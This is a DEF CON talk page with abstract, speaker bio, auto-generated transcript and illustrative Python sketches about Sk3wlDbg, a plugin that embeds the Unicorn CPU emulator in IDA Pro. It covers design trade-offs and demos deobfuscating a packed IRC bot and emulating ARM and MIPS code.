
Emulating all (well many) of the things with Ida


Formal Metadata

Title
Emulating all (well many) of the things with Ida
Number of Parts
93
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Content Metadata

Abstract
It is not uncommon for a software reverse engineer to want to execute a bit of the code they are studying, either to better understand that code or to have it perform some useful work related to the reverse engineering task at hand. This generally requires access to an execution environment capable of supporting the machine code being studied, both at an architectural level (CPU type) and a packaging level (file container type). Unfortunately, this is not always a simple matter. Most analysts do not have a full complement of hosts available to support a wide variety of architectures, and virtualization opportunities for non-Intel platforms are limited. In this talk we will discuss a lightweight emulator framework for the IDA Pro disassembler that is based on the Unicorn emulation engine. The goal of the project is to provide an embedded multi-architecture emulation capability that complements IDA Pro’s multi-architecture disassembly capability, enhancing the versatility of one of the most common reverse engineering tools in use today.

Bio: Chris Eagle is a registered hex offender. He has been taking software apart since he first learned to put it together over 35 years ago. His research interests include computer network operations, malware analysis and reverse/anti-reverse engineering techniques. He is the author of The IDA Pro Book and has published a number of well-known IDA plug-ins. He is also a co-author of Gray Hat Hacking. He has spoken at numerous conferences including Black Hat, DEF CON, ShmooCon, and ToorCon. Chris also organized and led the Sk3wl of r00t to two DEF CON Capture the Flag championships and produced that competition for four years as part of the DDTEK organization.
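The core idea described here, running a handful of instructions on a bare CPU model and inspecting the resulting state without a loader, operating system or device model, can be illustrated with a toy interpreter. The sketch below is hypothetical: the `ToyCPU` class, its five-instruction ISA and its method names are invented for illustration and are neither Unicorn's API nor the plugin's code. It only mirrors the shape of a Unicorn-style session (load code into memory, initialize state, register a per-instruction hook, run from a start address to a stop address); Unicorn's actual Python binding exposes calls such as `Uc.mem_map`, `Uc.mem_write`, `Uc.reg_write`, `Uc.hook_add` and `Uc.emu_start` for those steps.

```python
from typing import Callable, Dict, List, Tuple

# Hypothetical toy instruction set, NOT a real architecture and NOT Unicorn's API.
# Each instruction is a tuple occupying one address slot:
#   ("movi", reg, imm)      reg = imm
#   ("xorb", reg, key)      mem[reg] ^= key   (XOR one byte of memory)
#   ("inc", reg)            reg += 1
#   ("dec", reg)            reg -= 1
#   ("jnz", reg, target)    if reg != 0: pc = target
Instr = Tuple
Hook = Callable[["ToyCPU", int, Instr], None]


class ToyCPU:
    """CPU-only emulator: registers plus flat memory, no devices, no OS, no loader."""

    def __init__(self, mem_size: int) -> None:
        self.regs: Dict[str, int] = {"pc": 0, "r0": 0, "r1": 0}
        self.mem = bytearray(mem_size)
        self.code: Dict[int, Instr] = {}
        self.hooks: List[Hook] = []

    def load_code(self, base: int, instrs: List[Instr]) -> None:
        for offset, ins in enumerate(instrs):
            self.code[base + offset] = ins

    def add_code_hook(self, callback: Hook) -> None:
        # Callbacks fire before each instruction executes, similar in spirit
        # to a per-instruction code hook in an emulation framework.
        self.hooks.append(callback)

    def step(self) -> None:
        pc = self.regs["pc"]
        ins = self.code[pc]  # KeyError if execution leaves the loaded code
        for callback in self.hooks:
            callback(self, pc, ins)
        op, next_pc = ins[0], pc + 1
        if op == "movi":
            self.regs[ins[1]] = ins[2]
        elif op == "xorb":
            self.mem[self.regs[ins[1]]] ^= ins[2]
        elif op == "inc":
            self.regs[ins[1]] += 1
        elif op == "dec":
            self.regs[ins[1]] -= 1
        elif op == "jnz":
            if self.regs[ins[1]] != 0:
                next_pc = ins[2]
        else:
            # No hardware model: anything outside the toy ISA simply fails.
            raise ValueError(f"unsupported instruction {op!r} at {pc}")
        self.regs["pc"] = next_pc

    def run(self, begin: int, until: int, max_steps: int = 10_000) -> None:
        """Execute from `begin` until pc reaches `until`, with a step limit."""
        self.regs["pc"] = begin
        for _ in range(max_steps):
            if self.regs["pc"] == until:
                return
            self.step()
        raise RuntimeError("step limit reached before reaching `until`")


# Usage: run a small XOR decode loop over an obfuscated string, then read the
# decoded bytes back out, as an analyst might before annotating a static listing.
KEY = 0x5A
cpu = ToyCPU(mem_size=0x100)
cpu.mem[0x10:0x15] = bytes(b ^ KEY for b in b"HELLO")
cpu.load_code(0, [
    ("movi", "r0", 0x10),  # r0 = address of the encoded buffer
    ("movi", "r1", 5),     # r1 = number of bytes to decode
    ("xorb", "r0", KEY),   # loop body starts at address 2
    ("inc", "r0"),
    ("dec", "r1"),
    ("jnz", "r1", 2),
])
trace: List[int] = []
cpu.add_code_hook(lambda c, pc, ins: trace.append(pc))
cpu.run(begin=0, until=6)
decoded = bytes(cpu.mem[0x10:0x15])
print(decoded)  # b'HELLO'
```

Stopping at an explicit end address, rather than running a whole program, reflects the use case in the abstract: execution starts at the loop's setup, halts at the first instruction after it, and the decoded bytes are then available to copy back into the static view.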
Transcript: English (auto-generated)
All right, DEF CON. So, you're at the last talk of the evening. Please welcome Chris Eagle. Thanks very much. Anybody hear me? Can't hear you? Can't hear me? Good. I'm Chris
Eagle, thanks for coming. We've got the Mr. Robot panel next door. Maybe you're all here to just stare at the sexy machines back here, I don't know. I'm about tired of them. Oh, where'd my sheep go? She wandered off. Okay, wrong angle. Not her best side.
Okay, I'm here to talk about a project that I've been working on, for lack of a better name, called Sk3wlDbg. It's about emulating various processors using the
Unicorn framework for emulation that was released at Black Hat last year. And because it's kind of what I do, it's all baked into IDA, and we'll see if it's interesting, go through a couple of examples, watch things crash, and hopefully have some fun. I gotta
say this: everything I say today is my own opinion, not that of my employer and certainly not that of DARPA. They don't let me talk on there right now. A little bit about me if you don't know; these folks down here in the front row are filling seats to make the room look full. I'm a senior lecturer of computer science out at a place
called the Naval Postgraduate School in Monterey, California. I've been doing security-related stuff for a long time now. I do a lot of reverse engineering of various sorts. I play a lot of capture the flag; I'll be racing back over there right after this talk is over. And I'm a performer of really stupid IDA tricks, right?
Proving that just because it can be done doesn't mean it should be done, but that's what you're here to watch, I guess.

So this is really about CPU emulators, right? They're useful in a lot of cases where you may not have the hardware to run a
particular set of code on, whether it's a well-structured binary or just a small snippet of something like, say, shellcode. You don't happen to have an ARM device or a MIPS device or a SPARC device sitting around, and you want to know how this thing behaves. So you're either going to become the world's best human MIPS engine, and you
can interpret this stuff in your head, process it, and figure out what's going on, or you might want some help. Okay, and that's what I was looking for when I started thinking about baking emulators into things like IDA. Because in my particular use case, IDA is virtually my desktop. I'm in it all the time and I often have the desire to
step out and execute something, because perhaps my comprehension of the instruction set is not sufficient for me to understand what I'm reading, or I just want to verify my suspicions about the behavior of a section of code. I'd like to run through it, perhaps not an entire executable. Maybe I don't want to have to load up the ELF and deal with, you
know, the kernel loader and the operating system, libraries, and a full-blown execution environment just to run through 5 or 10 lines of code. Okay, so I thought about this and decided, you know, if I could just run these lines of code anytime I wanted
in some very stripped-down environment, wouldn't that be nice? We'll talk about how I got there from here. Now, you also may want to run code on obsolete platforms because you don't have real hardware to do it on. There are plenty of software emulators out there these days that do these kinds of things, but another use case for
emulation, and there's another one I missed, and I'm not going to go back. So, emulators run the gamut, starting from the simplest emulators there are. Unicorn is in fact a fairly simple emulator. In fact, it's not itself an emulator; it's not a standalone thing. It is
an API that lets you point at instructions and execute them, one or more at a time, receiving some signals along the way: you can hook into it and get callbacks and so on. I'm really not going to talk about the inner workings of Unicorn, but I would encourage you to go out and find some of the slide decks that they've posted following Black Hat last year; there are some other presentations
they've given at a variety of conferences. Dig into the project if you think you have a use for baking an emulator into anything. It is to the execution of instructions sort of what Capstone was to the disassembly of instruction sets: a fairly
general-purpose framework across many architectures that lets you script things up very quickly. In this case, we're going to execute things in just a few lines of code. That's the basics of Unicorn, all I'm going to get into. There are some fairly sophisticated emulators out there, and I will refer to those later on, but Unicorn
literally points at an instruction, updates the internal state of Unicorn, and that is it. If that instruction manipulates hardware, you're not going to get anything like that. So the notion of a full-blown emulator, like QEMU, isn't what you're going to
get out of Unicorn. So the idea with this project was to build a lightweight CPU emulator available in a static reverse engineering context. I didn't want to have to go full-on dynamic analysis with debuggers and processes and hardware and an operating system, any of that
stuff. I just wanted a very lightweight emulator that would let me step through code. We can expand on it from there, and I'll go into a little bit of the history and what led me here in a couple of slides. The idea is you're looking at some code, we step out of that static context, we go execute some instructions in
this emulated manner, and then we take the knowledge that we gained by observing the execution state, either to enhance our understanding of the binary or to incorporate some of that information back into our static picture to perhaps improve a disassembly, make some annotations, what have you. Maybe something as simple as utilizing a simple loop
that you see in some code to decrypt, decode, de-obfuscate, whatever it might be, whether that's code itself (self-modifying code) or some data, some strings, anything like that, and then bringing that data or that information back into our static
analysis without having to continue execution. Okay, so the end result is what I'm going to talk about today: this lightweight emulator that I baked into IDA, because if it's not in IDA, I'm probably not going to use it. IDA provides my static
analysis side, my disassembly side, and then the emulator, as I mentioned previously, is going to be based on this Unicorn framework.

I imagine if you're sitting in this room today, you're probably familiar with IDA. If you're not, it's a commercial
disassembler. There are some other disassemblers out there; we're seeing new ones every day. Binary Ninja is a new one that was just released, and maybe we can take this project and integrate it with that someday. But for now, I'm primarily working in IDA. It supports a lot of different processor families, and that, to me, made it attractive to
marry up with Unicorn, which also supports a lot of different processor families. Not as many as IDA does, but more than one, more than two, more than three, I don't know, six or so; I'll list them out here in a minute. But it meant that IDA could understand all of the code that I would ever want to emulate in Unicorn, because the processors that IDA supports are a superset of the processor
architectures that are supported by Unicorn. IDA itself has integrated debugging support, so actual dynamic analysis: fire up a process, attach to it, and pull in state, for x86 and ARM targets, and it can do some
remote debugging on some other targets. It also has a decompiler for 32- and 64-bit x86, along with 32- and 64-bit ARM, but that's not entirely relevant to our talk today.

Unicorn, as I mentioned, was introduced at Black Hat last year, and comes out of
the same group that did Capstone, the disassembly framework, and now they have a tool called Keystone. In fact, they may have talked about it at Black Hat. Anybody at Black Hat? Did they do Keystone this year? Yep. So they talked about their new project, Keystone. I hope these guys keep coming back. That's like three years in a row: Capstone, Unicorn, Keystone. They're all pretty useful
projects. Keystone is their assembly framework, so now we have a disassembly framework, an assembly framework, and an emulation framework, and when you start rolling these things together you get some pretty powerful reverse engineering capabilities. The link to their site is up there on the slide. As an emulation framework, Unicorn is actually based on QEMU, so if you've ever
used QEMU, you know that it also supports a large number of architectures, and you might say, well, why do we have Unicorn if QEMU supports a large number of architectures and, in fact, Unicorn is based on QEMU, right? Isn't this
just the same thing all over again? Okay, the answer's not quite. QEMU has a lot of support, all the way down into hardware shims, that lets you do full-blown system emulation; we can boot Linux, we can boot Windows in QEMU environments because it has that support for hardware interfaces and virtual devices and so on. But
the Unicorn folks were not interested in any of that. All they wanted to do was emulate processor instructions. They didn't want the hardware interface, they weren't trying to provide you network and video drivers or any of that stuff; they just wanted
to help you emulate instructions. What does it do? Let's see, right, we run it in the emulator. What they did was tear into QEMU, rip out all of that hardware abstraction layer, and they were left with only, effectively, the processors,
right, the software CPUs, that they then layered on top of: we instantiate a processor, we give it some state that it can manipulate, and they give you access to that processor state, nothing more. They exposed some of that through a couple
of different types of APIs, and there you have it: the scriptable emulator. It supports the processor families that you've seen here: x86, both 32 and 64 bits, same for ARM, SPARC, MIPS, and Motorola 68000. That's not all of the processor families that are supported by QEMU, but it's a start. It does take a fair
amount of work to provide the interface to a given processor architecture, but I don't think it would be a stretch to add in some of the other processor families that are supported by QEMU if you wanted to enhance the capabilities of Unicorn. A
number of projects, this is just one of them, have come along that make use of Unicorn. Some of them are pretty amazing and baked into a lot of very interesting analysis frameworks. I posted a link at the bottom because you may be more interested in those than in Unicorn itself, because they provide somewhat
more finished products, things that you'd make use of right out of the box if you didn't have a need to script an emulator of your own. So you can go find those out there and play around.

Okay, so I picked IDA and I picked Unicorn. There are some other emulators, as
I've mentioned. I've talked about QEMU already; I haven't talked about Bochs. Bochs is another one; it is a pure x86 emulator. These are blurbs off of each of their project pages: Bochs is a highly portable open source 32-bit x86 emulator, while QEMU is a generic and open source machine emulator and virtualizer that supports more
processors. It's a little bit more sophisticated than Bochs, but there's also a lot more to it than Bochs. So I could have gone with either of these, I suppose, but they really weren't
geared to be scripted around, to access just the processor bits. So this is sort of where I've been with this project. It's been kind of a long road. Unicorn came along and filled a need that I had and actually fulfilled a vision that I had back in 2003 when I built a tool called ida-x86emu, where I
wanted to do exactly what I described: I wanted to sit in IDA and just emulate things, and use that to either transform my static analysis picture or enhance my understanding of the behavior of something. So I did that, and at the time, I looked at those emulators, primarily Bochs and QEMU back then, and
thought, you know, can I rip into this, strip out the bits I don't need, and take just the emulator? I looked at it, and I'm lazy, and I said, hell no, maybe because they're way too big. So 13 years later, 12 years later, somebody did it for me, and so then I revisited this project and retooled, and that's, again, why I'm
talking today: somebody did all the heavy lifting by stripping all the unnecessary stuff out of QEMU and dropping it in my lap. Along the way, the Hex-Rays folks did an integration between IDA and Bochs. They did it in a slightly different way; I'll do two quick demos later on of what these things look like and
the different approaches that you might take as you think about doing emulation in combination with static analysis. They released a Bochs debugger module that IDA could communicate with. If you're familiar with IDA, you understand what the debugging views look like in contrast to the pure static analysis views, and we'll see
that here in a few minutes. I did a similar thing for the MSP430 processor, which was the processor used for the Microcorruption challenges, if any folks have seen that. They're a lot of fun. That was a pure MSP430 implementation, and I
didn't want to deal with their clunky user interface through a browser, so I did this emulator in a style very similar to ida-x86emu. Then along came Unicorn, and it took me a while, but I finally decided to integrate it into IDA and
see if I liked it better or if it proved more useful than some of these other combinations of tools. As I mentioned, I looked at QEMU and Bochs briefly, but it was going to be a lot of work; I didn't have the time to do it all, and again,
somebody else came along and did it. Because their approach finally gets QEMU involved in this whole thing, it gives us a lot more processors than my particular approach, which was specifically an x86 emulator. I got that one narrow architecture, I've never had another architecture, and I've never wanted to do
another architecture, because doing an architecture from scratch was just more work than I wanted to get involved with. So this was a nice marriage for me.

Now, to the implementation. In implementing this, I had to make a couple of choices. Again,
hopefully people are somewhat familiar with IDA and what it looks like. With IDA, you get your standard disassembly view, and then there's this debugging view, but you have to do a little bit of work to integrate what you learned from the debugger back into the
disassembly view, and oftentimes it involves overwriting a lot of information in your disassembly view. You might go into the debugger and learn something, but it's fairly transient in nature, because you're starting a process, eventually that process is going to terminate, and the information that you learned vanishes with that
process. There are ways to migrate some of that information back into IDA, overwriting your original data in IDA, but you'd have to automate some of that, and it's not necessarily a very clean approach. The alternative approach is that you don't jump out into a debugger; you find some way to incorporate emulation right there alongside
your static analysis view. In order to do that, your emulation has to be able to maintain state, so you're either maintaining state entirely separately from what you're looking at in IDA, right? In IDA, you get to see an entire disassembly through the various portions of a program: your code, your data, etc. What you don't have are things
like a stack or a heap, any of your virtually allocated memory, but you need that in the emulation. So you either start modifying your database and adding all of those bits and pieces in there, so that you expose them and make them
available to view and navigate through, or all of that information remains buried in the emulation and you have to come up with some way to propagate just what you want up into the static analysis view when you're ready to consume it, when you've decided that you've learned what you wanted to learn and you're ready to annotate that static analysis. When I did ida-x86emu, I took the first approach, and you're literally
emulating on top of an existing IDA database, so as you do the emulation, your database gets modified. There are some advantages and disadvantages to that approach. The disadvantage is obviously that it's destructive: once you've modified
something, if you're an IDA user, you know there's no undo in IDA, so once you've modified it, there's no going back. If you want to see what it used to look like, you're either maintaining a separate database or a lot of snapshots, and it becomes a headache, but I have found it to be useful in many cases. The alternative approach is to take a debugging sort of approach,
and generally speaking, in IDA, that means you're launching a process and attaching to it the way a standard debugger would attach to that process, controlling the process, viewing the state of the process, using IDA as a viewer,
so you see what the running process state is. It gives you access to all the things you'd have in a typical debugger, and in this case, you're not manipulating your static view at all; that IDA database doesn't get changed unless you absolutely want it to. Your view is strictly into that transient process,
and again, when it's done, you're done. Perhaps you learned something, perhaps you use it to update your state; the way you use that is entirely up to you. This is the approach that the Hex-Rays folks took when they integrated Bochs into IDA. IDA shells out to Bochs, they created some IPC links between IDA and Bochs, and IDA
pushes the state into Bochs, including the code and the data that are represented in that IDA database, and then tells Bochs to go: it gives it an initial register state and then single-steps or allows it to run freely, as you
see fit, then pulls the data back out of Bochs and shows it to you in IDA's debugger view. But again, once you're done, you're done, and none of that updates your static analysis state. As I mentioned, there are some ways to pull state back into IDA, but it's entirely up to you how you're going to do it. I'll show you some demonstrations of the two approaches, and you can use that to understand what I
did with Unicorn. In the case of Unicorn, the approach I ended up taking was the debugging approach, because it just felt a little bit cleaner. I didn't want to get into updating databases; I wanted to leave things flexible for the future. I might come
along and implement it differently. But if you implement it outside of a debugger, IDA doesn't provide you any tools to display something like registers, for example, or any of that execution state; while you're in a static analysis state,
registers have no value, so you have to invent that user interface yourself, okay, so that's one of the hard parts about doing it, um, outside of the debugger state. My slide, I don't know, or agreeing with it. In any case, um, I took on this task, trying to
integrate Ida with Unicorn, a lot of unhappy development time, a supportive wife, a lot of time dealing with a mostly undocumented Ida interface, dealing with a particular style of plugin known as a debugger plugin, again, for those of you who know Ida, you know the
state of its documentation, so I spent a lot of time reverse engineering Ida to try to learn how their debuggers actually work, because there isn't much to go on there. At the same time, I was trying to integrate a piece of software that was really, I say beta, that's kind of generous, at the time I was doing this, it was more like pre-alpha, okay, so, uh,
you never know where the problems lie: is it Unicorn, is it IDA, is it me? That's what led to bullet number one. But in the end, I was able to subclass IDA's debugger type to provide debuggers for all of the supported Unicorn processor families, and end up with a debugger-style interface for any one of these architectures that you can use to emulate code wherever you are. So if you're using IDA on Windows with Unicorn, and you open up a MIPS binary, you don't have to go find a MIPS platform anywhere. You can just pop out into the debugger and emulate through your MIPS code, and if you want to, you can use IDA's features for pulling some of that information back. The same is true for SPARC, ARM, 68K, x86, or 64-bit x86 on a 32-bit platform, or vice versa. So I got exactly what I wanted 12 years ago, with a lot more flexibility. You can go anywhere from "I've got five lines of code I want to emulate" to trying to emulate through an actual process. If the code is packaged as an executable, like an ELF or a PE, the debugger plugin tries to load it and map it into an address space that is roughly what you'd get if you ran it on the architecture the binary was intended for. There are a lot of challenges with doing that. We don't get to emulate through the kernel, and we don't have a system call interface, although, as I'll talk about later, one of my goals is to add the capability of hooking system calls, so you can stub out some of the more common ones and provide some fake results back up into your emulation. So the debugger includes very basic loaders for PEs and ELFs that load those two file formats into Unicorn's emulation state before you start your emulation, give you stacks, and so on. If you don't have a format that Sk3wlDbg recognizes, then all it does is take the entire content of your IDA database and copy it out into mapped sections in the Unicorn emulator, so however it's mapped in IDA, that's what you get in Unicorn. It usually throws in a stack, because that's something you're going to need that you don't ever see in IDA, and stacks are pretty useful; an awful lot of instructions make use of them. Some of the issues with doing all of this: if anybody's used Unicorn,
you might have some familiarity with building it. IDA is a 32-bit executable. Even though you may see that there's a 64-bit version of IDA out there, all that means is that it can understand 64-bit binaries; it is still a 32-bit native executable when you go to run it. That means that if you want to integrate with it, you've got to build 32-bit libraries. So when you build Unicorn, you've got to build the 32-bit Unicorn library for the platform you're running IDA on, whether that's Windows, Linux, or a Mac. Unfortunately, Unicorn doesn't have very good support for building 32-bit libraries. They sort of assume that everybody's doing 64-bit stuff these days, so why would you want to build 32-bit binaries anymore? We had to fix that up a little bit, and they're getting better at building 32-bit binaries. It also does not have very good support for building on Windows, and that's primarily related to QEMU's dependence on GLib, which is not found on Windows platforms unless you reach out and get things like Cygwin or MinGW and install the requisite libraries from those environments. This complicates Windows builds; in fact, if you go look at the state of the project on their GitHub site, they don't have Windows built into their continuous integration. So building on Windows is a little bit tough, but it can be overcome, and in the end you're able to integrate Unicorn into IDA on all the platforms for which IDA is available. That's about all I'm going to talk about at a high level. It's pretty straightforward: here's a disassembler, here's an emulator, and it either
works or it doesn't. So we'll see. I'm going to go through some demos and show you what it looks like. I'm going to start off with some simple deobfuscation, and I'm going to show it to you in a couple of different ways. I'm going to go through it fairly quickly and try not to get bogged down in the details of IDA-isms or how to use IDA. I'm just going to show you what each of these things does and what it looks like, and let you form your own opinions as to the utility of each, and perhaps whether you prefer one approach to another. So if this all works out, I'm going to use this old-style emulator. Let's see, I've got to pick the right version of IDA; we'll do this one. You may recognize the section name: this is just a UPX-packed binary. If all goes well here, I'm going to bring up this old emulator. Please work... it's coming, my machine's slow. This is an example of the original x86 emulator that I did in IDA (good jokes), and what you're going to see here, assuming this works, is a crude debugger console that's going to come up. We're not going to leave IDA's static user interface (I'm not happy with this), and we're going to be able to emulate through the code without leaving IDA's normal interface, unless it never comes up. Awesome. While that's going on, we may as well start the other one. Behind this door, we're going to try and do this with Bochs, IDA's integrated Bochs plugin. In order to do that, we've got to switch our debugger over, and you see IDA offers a number of debuggers. It's context aware: it considers what platform you're running IDA on and the nature of the binary you're loading. So you can see one of these is a local Bochs debugger, and assuming I haven't messed this up and still have Bochs installed properly, I choose Bochs as the debugger. Oh, that doesn't do anything; we've got to actually run it. So I'll set a breakpoint at the beginning of the code here, and I'll set a breakpoint down toward the end over here. We're not going to jump out and execute any of these function calls, because they jump out into Windows libraries; we'll just set a breakpoint down here at the end. Maybe I'll bring up a strings view to try to convince you that it's actually doing work. All these strings, and I don't know if that shows up at all, are the obfuscated strings that are part of the binary. You can see bits and pieces of strings, but it's not fully deobfuscated. If Bochs lets me do this, then we can start debugging, and this is going to toggle into, maybe, a segue back to the other demo.
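The whole trick in this demo is to check the strings view before and after the decoding loop runs. Below is a sketch that assumes a made-up XOR decoder. `toy_decode` is hypothetical and is not UPX's scheme or this bot's actual scheme. The scanner reports runs of printable ASCII together with their addresses, which is roughly what a strings view does over a block of memory. The base address `0x401000` is also just an example.

```python
import re
from typing import Iterator, Tuple


def ascii_strings(memory: bytes, base: int = 0, min_len: int = 4) -> Iterator[Tuple[int, str]]:
    """Yield (address, text) for every run of at least min_len printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(memory):
        yield base + match.start(), match.group().decode("ascii")


def toy_decode(blob: bytes, key: int) -> bytes:
    """Hypothetical self-decoding loop: XOR byte i with (key + i) & 0xFF.
    The same call encodes and decodes."""
    return bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(blob))


if __name__ == "__main__":
    plain = b"\x00\x00NICK bot\x00SOFTWARE\\Run\x00"
    image = toy_decode(plain, 0x41)  # what sits in the file before the loop runs
    print(list(ascii_strings(image, base=0x401000)))  # noise or fragments at best
    decoded = toy_decode(image, 0x41)  # what memory holds after the loop runs
    for addr, text in ascii_strings(decoded, base=0x401000):
        print(hex(addr), text)  # 0x401002 NICK bot, then 0x40100b SOFTWARE\Run
```

The minimum length of 4 is an arbitrary default. A larger value cuts down the noise reported from the still-encoded image.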
No, there's Bochs, there's Bochs starting up; I've got too much going on in this machine. So IDA started Bochs, it's got this IPC channel between the two, and now IDA gives us a debugger view. We're not really running the process; all the emulation data has been stuffed into Bochs, and Bochs is going to do its thing. But this is a standard IDA debugger view: if you were running a process and actually attached to it, this is what you'd see. It's not the best user interface in the world; that's probably the number one knock against using IDA as a debugger. But we can step through it, and the register state updates up here, and so on, and we can let it run, and we should hit our second breakpoint at some point down there. Then we can go back and look at the strings in the binary, and maybe, if I did this right... you're just going to have to trust me. Wow, it's got to pull these strings out of Bochs memory. Let's see how our other thing is doing. Look at that, it's like a cooking show: we've got a couple of things in the oven at a time. So this is back to the emulated view, IDA x86emu, a totally different view. We never leave the normal IDA interface, and you've got this tiny little panel that pops up. It's very specific to x86, so if you took this approach with other architectures, you would have to come up with your own interface and replace all the x86 registers with whatever registers you have for that particular architecture. It lets you do some things like manipulate memory, but memory is really just the database. Everything you're manipulating is just a change to the database; that's your memory store. You fetch bytes out of the database, you emulate them, and you modify the database if that's what the instruction says to do. But again, it's destructive. So we can sit here and I can click step, step, and it's hard to see, but if you watch the blue here (it doesn't really highlight), that blue is stepping through various instructions; it jumps down, it follows through, and so on. I can reach down to the same part of the binary, which is down here before these function calls, set a breakpoint, and say run. This is much slower than Bochs, because all the interactions with the IDA database are pretty slow, but we hit our breakpoint, and we can go back to our strings window and set it up again, and we should have lots of interesting strings, like this. This is just an old IRC bot, but we got all these strings out of it because it's mostly deobfuscated. Then you say you're done, we close this up, and you go back here, and in fact, what was formerly empty space is now code that we can go and disassemble. We didn't hop into a debugger; we've destroyed our database, in the sense that it doesn't look like it used to look, but we've got deobfuscated code, and we just continue doing static analysis at this point. So it's a quick in and out, and I considered that approach; if not for the user interface aspect of it, I might have gone that way. Now let's see if Bochs is behaving for us. Over on the Bochs side, we got, hopefully, the same strings somewhere. We got all this library code, and I have no idea where that's even coming from... nope... oh yeah, here we go.
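The Bochs session never touches the database, so to keep results like these decoded strings you have to copy the changed bytes back by hand. One way to sketch that, assuming you can read the same address range from both the database and emulator memory, is to diff the two snapshots into contiguous runs. `changed_runs` is a hypothetical helper, not part of IDA or Bochs.

```python
from typing import List, Optional, Tuple


def changed_runs(original: bytes, current: bytes, base: int) -> List[Tuple[int, bytes]]:
    """Return (address, new_bytes) for each contiguous run where `current` differs
    from `original`; both snapshots must cover the same range starting at `base`."""
    if len(original) != len(current):
        raise ValueError("snapshots must cover the same address range")
    runs: List[Tuple[int, bytes]] = []
    start: Optional[int] = None
    for i, (old, new) in enumerate(zip(original, current)):
        if old != new and start is None:
            start = i  # a changed run begins
        elif old == new and start is not None:
            runs.append((base + start, current[start:i]))  # the run just ended
            start = None
    if start is not None:
        runs.append((base + start, current[start:]))  # run reaches the end
    return runs


if __name__ == "__main__":
    database_view = b"\x00\x00\x00\x00abc"
    emulator_view = b"IRC\x00abd"
    for addr, data in changed_runs(database_view, emulator_view, 0x401000):
        print(hex(addr), data)
```

Inside IDA, each `(address, data)` run could then be written with a patching call such as IDAPython's `ida_bytes.patch_bytes(ea, data)` (IDA 7.x naming). The sketch stops before that step so it runs outside IDA.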
Right, and so here, again, it's an IRC bot, and you can see registry keys in there that it's going to reference, and so on. So we get the same result, but we haven't modified the IDA database at all; it's like a running process. I would have to then extract this from Bochs back into IDA if I wanted to make this data permanent. So this is, again, the approach that I took. Now we'll do this a different way, and if you thought those demos were bad, let's see how we do here. Set a breakpoint up here, try to set a breakpoint in the same place down here, and this time I'm going to switch my debugger over, and if it's installed appropriately, it'll show up as Sk3wlDbg. So we do this, we go back up here to the beginning, and we try to kick this off. Hopefully I hit my first breakpoint, and then the plugin looks a lot like Bochs, but this is Unicorn handling this particular emulation, so you get register state over here, just like you do in Bochs and any other debugger. At this point, we can just step through, and it tracks along, and I can let it run, and we'll do the whole strings trick and see if we get anything interesting. Right now there's not much, just the names of the couple of libraries that get imported. We go back over here and let it run, just hit go, hit our breakpoint, come back, rerun strings, and like the other two emulators, now we've got all of these strings extracted from memory. If we go down to the bottom of the self-decoding loop, we can jump up, and very much like Bochs, this is the extracted code, which we can then turn into code up here in the debugging session. But again, I don't have that back in my database, and when I go to quit this, I'm right back where I started from. I don't have any strings, and if I follow the jump up here, you can see it's empty, because this is the region in the binary that it unpacks itself into. So it's very much like a debugger, and not a static overwrite or whatever you might want to call it. So that's it emulating 32-bit x86 code on 64-bit Windows. Let's see what else I think I'm going to do: local ARM emulation. This is a Windows platform, with no network connections and no ARM hardware, and somewhere I've got an ARM binary open. Let's see where this one comes from... there we go. This is an ARM binary from an old DEF CON Capture the Flag (shout out to LegitBS), one of their first CTFs, but it's an ARM binary on Windows, and IDA's actually not going to offer me any debuggers, because it has no clue what to do with this: an ELF binary, ARM, on Windows. It doesn't do ELF, it doesn't do ARM. But the debugger recognizes the architecture at least, so it says "I'm available," and it's the only one available, so IDA's already selected it up there, and we can kick this off, and now we're debugging ARM, more or less, via emulation. Don't worry about that. Awesome. Let's see what goes on. So there are some memory mapping problems there. Let's see if... yep, not going to work. Clapping for my crash. Look at that, we'll just pass all these exceptions down, and it looks like it's advancing, and maybe it's even updating registers: R2 is actually equal to 1 at this point. Look at that. I left this open, and it had some stale state, and I think it's not happy with me, but that's the idea: we're in a debugging session, and we can jump in and out of this without having to fire up an ARM environment or do any remote communications to a remote ARM device, and then when we're done, we step out, and we're back in our IDA disassembly session. What else? Oh, now MIPS. Let's see, MIPS I don't even have any idea how to read, so somebody out there probably says that's MIPS; I don't know, but IDA thinks it's MIPS. Again, there's no MIPS debugger in IDA, so I can't switch my debuggers; there's no other debugger option, but you can see that (no, don't do that) Sk3wlDbg is selected. So we try to hit go here, and hopefully we hit our breakpoint, from which maybe we can step, although I don't have a stack; this is probably a bad choice. Let's see: step, step, step, step, and we're tired. So we hop out of that, and we're back in our disassembly view.
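With no PE or ELF loader to rely on, the fallback described earlier copies IDA's segments into the emulator and adds a stack. The MIPS demo shows what happens when there is no usable stack. The layout math can be sketched as follows. The sketch assumes Unicorn's requirement that mapped addresses and sizes be 4 KiB aligned. Merging regions that share pages, and placing the stack one guard page above the highest segment, are this sketch's own choices and not necessarily what Sk3wlDbg does.

```python
from typing import List, Tuple

PAGE = 0x1000  # Unicorn maps memory in 4 KiB-aligned address/size units


def page_down(addr: int) -> int:
    return addr & ~(PAGE - 1)


def page_up(addr: int) -> int:
    return (addr + PAGE - 1) & ~(PAGE - 1)


def plan_mappings(
    segments: List[Tuple[int, int]], stack_size: int = 0x10000
) -> Tuple[List[Tuple[int, int]], int]:
    """Turn (start, end) segment ranges (end exclusive) into page-aligned
    (start, size) regions, merging overlapping or touching ones, then append
    a stack region. Returns (regions, initial_sp)."""
    aligned = sorted((page_down(s), page_up(e)) for s, e in segments if e > s)
    merged: List[List[int]] = []
    for start, end in aligned:
        if merged and start <= merged[-1][1]:
            merged[-1][1] = max(merged[-1][1], end)  # extend the previous region
        else:
            merged.append([start, end])
    regions = [(start, end - start) for start, end in merged]

    # Hypothetical placement: one unmapped guard page above the highest segment.
    top = merged[-1][1] if merged else 0
    stack_base = top + PAGE
    stack_size = page_up(stack_size)
    regions.append((stack_base, stack_size))
    initial_sp = stack_base + stack_size - 0x100  # leave a little headroom
    return regions, initial_sp


if __name__ == "__main__":
    segs = [(0x400000, 0x400123), (0x400800, 0x401800), (0x600000, 0x600010)]
    regions, sp = plan_mappings(segs)
    for start, size in regions:
        print(hex(start), hex(size))
    print("sp =", hex(sp))
```

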